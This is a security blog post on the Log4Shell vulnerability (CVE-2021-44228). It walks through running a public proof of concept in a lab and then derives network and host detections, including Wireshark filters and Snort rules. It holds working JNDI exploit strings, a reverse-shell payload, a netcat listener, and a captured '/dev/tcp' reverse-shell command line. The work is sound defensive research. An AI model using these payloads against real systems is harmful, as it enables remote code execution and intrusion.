log4j JNDI Exploitation
Situation
A remote code execution (RCE) bug was found in log4j. CVE 2021-44228 has been assigned to it. The vulnerability lies in how log4j interprets Java Naming and Directory Interface (JNDI) URLs. JNDI lets an application look up a service. An attacker can craft a string that looks like “${jndi:proto://host/a}” where proto
is ldap or rmi, and log4j will connect to the host
to retrieve a
, which would specify how to process the log entry. However, a
can instead provide Java bytecode that log4j will execute.
log4j is used in a lot of places. The attacker can submit malicious input to multiple places. This includes: in a web form, as a user-agent, by renaming their Tesla, or sending a chat in Minecraft. Where the vulnerability manifests depends on how that organization’s infrastructure is configured. For example, it looks like naming your Airpods in the right format can induce a remote connection from Apple’s iCloud servers. Airpods are synced across all devices that a user owns via iCloud, so clearly log4j is logging the Airpods name at some point during the sync process. Minecraft servers, and every user connected to the server, are getting popped because both the client and server are using log4j to log chat messages.
In the rest of this blog, we’ll look at getting a Proof of Concept (PoC) running and what indicators we can extract from the networks and endpoints.
Get the PoC running
The first PoC I found was from tangxiaofeng7. This has a vulnerable “app” that simply calls log4j with a malicious endpoint. The Github page shows macOS Calculator.app being run as the payload. I’m going to use Ubuntu Linux as my test system, so I need to either figure out how to change payload or find a different way of running the payloads. During research, I find JNDIExploit. log4j is the “access” vector, but the actual bad thing happens due to JNDI. Let’s use that.
- Set up a new VM, Ubuntu 18.04. We need a Java Dev Kit and Maven. Clone the repo.
1
2
3
apt install openjdk-8-jdk maven
git clone https://github.com/tangxiaofeng7/apache-log4j-poc.git
git clone https://github.com/0x727/JNDIExploit
- Build the projects Spent way more time than I’d like trying to figure out how Java projects work.
1
2
3
4
cd JNDIExploit/
mvn package
cd target
java -jar JNDIExploit-1.3-SNAPSHOT.jar -i 0.0.0.0
ss -anpt
shows 1389/tcp and 3456/tcp running, great success. 1389 is implementing an LDAP endpoint that will “instruct” the vulnerable log4j function to connect to another location and execute the bytecode found there. 3456 is running an HTTP server that hosts the malicious bytecode. Unfortunately, a straight build does not work for the log4j poc. Had quite a few problems getting org.apache.logging.log4j to load. Seems like there are several methods to get it working, but here’s what I did.
1
2
cd ~/apache-log4j-poc
vim pom.xml
The POM file is a manifest for the Maven project. We add the maven-shade-plugin to generate an Uber JAR that includes log4j jars.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<build>
<plugins>
<plugin>
<groupId>org.apache.maven.plugins</groupId>
<artifactId>maven-shade-plugin</artifactId>
<version>2.4.1</version>
<executions>
<execution>
<phase>package</phase>
<goals>
<goal>shade</goal>
</goals>
<configuration>
<transformers>
<transformer implementation="org.apache.maven.plugins.shade.resource.ManifestResourceTransformer">
<mainClass>log4j</mainClass>
</transformer>
</transformers>
</configuration>
</execution>
</executions>
</plugin>
</plugins>
</build>
Now we can build with mvn clean package
. This removes everything in a target
directory and then packages the project into a .jar. We can then execute it with java -jar target/log4j-rce-1.0-SNAPSHOT.jar
. If we do, wee see the message
1
01:27:16.300 [main] ERROR log4j - ${jndi:ldap://127.0.0.1:1389/a}
And from the terminal window in which JNDIExploit is running from, we see
1
2
[+] Received LDAP Query: a
[!] Invalid LDAP Query: a
If we run JNDIExploit-1.3-SNAPSHOT.jar -u
we see the list of endpoints we can specify. We need to match the a
value to a legitimate endpoint that JDNIExploit is serving up. Edit apache-log4j-poc/src/main/java/log4j.java
to call something that legit. Inside of the main class, I put a bunch of payloads so I can later compare what happens.
1
2
3
4
5
6
7
8
9
logger.error("${jndi:ldap://127.0.0.1:1389/Basic/Command/whoami}");
logger.error("${jndi:ldap://127.0.0.1:1389/Basic/Dnslog/---.canarytokens.com}"); // get your own token at https://canarytokens.org/generate#
logger.error("${jndi:ldap://127.0.0.1:1389/Basic/Command/Base64/d2hvYW1pCg==}"); // whoami
logger.error("${jndi:ldap://127.0.0.1:1389/Basic/ReverseShell/127.0.0.1/4444}");
logger.error("${jndi:ldap://127.0.0.1:1389/Basic/TomcatEcho}");
logger.error("${jndi:ldap://127.0.0.1:1389/Deserialization/CommonsCollectionsK1/Dnslog/---.canarytokens.com}");
logger.error("${jndi:ldap://127.0.0.1:1389/TomcatBypass/Dnslog/---.canarytokens.com}");
logger.error("${jndi:ldap://127.0.0.1:1389/WebsphereBypass/Upload/Dnslog/---.canarytokens.com}");
logger.error("${jndi:ldap://127.0.0.1:1389/TomcatBypass/Dnslog/---.canarytokens.com}");
Once edited, we call mvn clean package
again and then re-run the jar. This time, we see errors like 01:31:06.557 [main] ERROR log4j - Reference Class Name: foo
, however we get successful connections to JDNIExploit that look like:
1
2
[+] Sending LDAP ResourceRef result for Basic/Command/Base64/d2hvYW1pCg== with basic remote reference payload
[+] Send LDAP reference result for Basic/Command/Base64/d2hvYW1pCg== redirecting to http://0.0.0.0:3456/ExploittvsunipOlR.class
If we had a packet capture running at this point, we’d see that the LDAP server is being connected to, but that HTTP server running on 3456/tcp is not being connected to. It turns out we’ve known since 2016 that JDNI is a vector for exploitation, and since Java 8u191 the default has been to not connect to URLs provided in a JNDI string. So we need to add System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase","true");
to log4j.java, before we call logger.
Now everything should work. I’ll start tcpdump to capture packets before re-running the vulnerable jar (tcpdump -i lo -s 65535 -w /home/user/ldap.pcap tcp port 1389 or tcp port 3456
), and start a netcat listener to catch the reverse shell (nc -nvlp 4444
). This time, both the LDAP and HTTP servers receive connections, you will trigger the DNS canary token, and receive a reverse shell to your listener.
Observables
Killchain scenarios
How can we detect or hunt for this activity? There are 2 scenarios that I’ve identified so far. Scenario 1 involves the LDAP JNDI lookup returning a javaNamingReference object that specifies a “second stage”. Two network connections are initiated from the vulnerable machine in this scenario - one to an LDAP server to perform the lookup, and a second to an HTTP server to download a Java object. This is the scenario demonstrated by the PoC (https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce). In the JNDIExploit framework, the “Basic” payloads use this scenario. We can see this in the following PCAP screenshot.
A flow chart of this scenario looks like:
Scenario 2 is where the LDAP JNDI lookup returns a javaSerializedData object. Only one network connection is made in this scenario. The searchResEntry object contains an attribute javaSerializedData which is exactly that - serialized Java bytecode. This bytecode is deserialized by log4j and executed. Its flow chart:
Detections
Network
Can we detect malicious input? The whole purpose of log4j is to log, so the malicious input is going somewhere. Is that log being centralized and indexed? Can we prevent the attack at (1)? Maybe. If the input vector is in line with something like a Web App Firewall (WAF), you might be able to block it before it gets to the vulnerable function. However, not every implementation has that opportunity, and even if you do, there are a lot of permutations that could make blocking with a WAF hard. A lot of the detection work that I’ve seen is focused on the input. This makes sense, because we want to prevent the attack from happening in the first place. My personal opinion is that this is a whackamole approach of trying to detect each new bypass technique as it is developed.
Can we detect the LDAP queries? By default, yes we should be able to. LDAP normally occurs over 389/tcp. However, we saw with JNDIExploit that it was running LDAP on 1389. Changing the port can obscure the traffic, but a protocol dissector can still identify LDAP since it is clear text. We can inspect outgoing traffic for LDAP using a tool like Suricata, and potentially block once it is observed.
Looking through the PCAPs that were made earlier, we can observe that there are a sequence of bytes in the packet payload that are the same for every LDAP packet. We’ll call these magic bytes since they fingerprint the protocol. In Wireshark, the following display filter showed only the LDAP queries.
data[0:1] == 0x30 && (data[2:4] == 02.01.02.63 || data[3:4] == 02.01.02.63)
In this screenshot we see these values highlighted in the hex dump. I’m not sure why the 02.01.02.63 sequence occurs sometimes at offset 0x2 and sometimes at 0x3.
Can we detect the LDAP responses? Remember there are two scenarios. One is a response with javaSerializedData and the other is javaNamingReference. The observed magic bytes for javaSerializedData are ac:ed:00:05:73:72:00. A Wireshark display filter is:
data[0:1] == 0x30 && data[1:1] == 0x82 && tcp contains ac:ed:00:05:73:72:00
For javaNamingReference, it is the string “javaNamingReference”. In Wireshark that’s:
data[0:1] == 0x30 && data[1:1] == 0x81 && tcp contains 6a:61:76:61:4e:61:6d:69:6e:67:52:65:66:65:72:65:6e:63:65
Can we detect the HTTP transfer of Java bytecode? By default, yes we should be able to. HTTP is cleartext. I think due to the presence of HTTP headers, Wireshark was able to automatically decode traffic over 3456/tcp. Zeek/Suricata may be able to do this as well. If so, it should be fairly simple to look for Java bytecode being sent over the wire. This Wireshark filter will show the Java magic bytes 0xcafebabe being sent:
data.data[0:4] == ca:fe:ba:be
And Zeek successfully sees the file:
Host
What can we detect on host? This is the tough one. On one hand, you can detect “weak” attacks that spawn new processes. Here is the process list (ps -efwwwH
) from the reverse shell:
1
2
3
root 9171 1 0 01:38 pts/4 00:00:00 /bin/bash -c /bin/bash -i >& /dev/tcp/10.10.10.146/4444 0>&1
root 9172 9171 0 01:38 pts/4 00:00:00 /bin/bash -i
root 9194 9172 0 01:38 pts/4 00:00:00 ps -efwwwH
The clear indicator is the /dev/tcp trick to create a TCP connection. Here, bash is a child of init. This may be implementation specific. The PoC is a single function .jar file. Once the java process exits, its children (bash in this case) are reaped and inherited by init. On a “real” server application, the java process is not likely to exit after log4j is called, so the process tree will look different. What we should see in that case is java as the parent of bash. After modifying the PoC to sleep for 10 minutes after calling the logger function, that’s exactly what we see:
1
2
3
4
5
root 10926 10770 7 14:31 pts/5 00:00:00 java -jar target/log4j-rce-1.0-SNAPSHOT.jar
root 10948 10926 0 14:31 pts/5 00:00:00 ping -c 1 ---.canarytokens.com
root 10956 10926 0 14:31 pts/5 00:00:00 /bin/bash -c /bin/bash -i >& /dev/tcp/10.10.10.146/4444 0>&1
root 10957 10956 0 14:31 pts/5 00:00:00 /bin/bash -i
root 10975 10957 0 14:31 pts/5 00:00:00 ps -efwwwH
Snort rules
I’ve turned the Wireshark display filters above into Snort rules. They can be found in this repo: kimobu/cve-2021-44228
Changelog
12/12/2021 - updated with additional detection information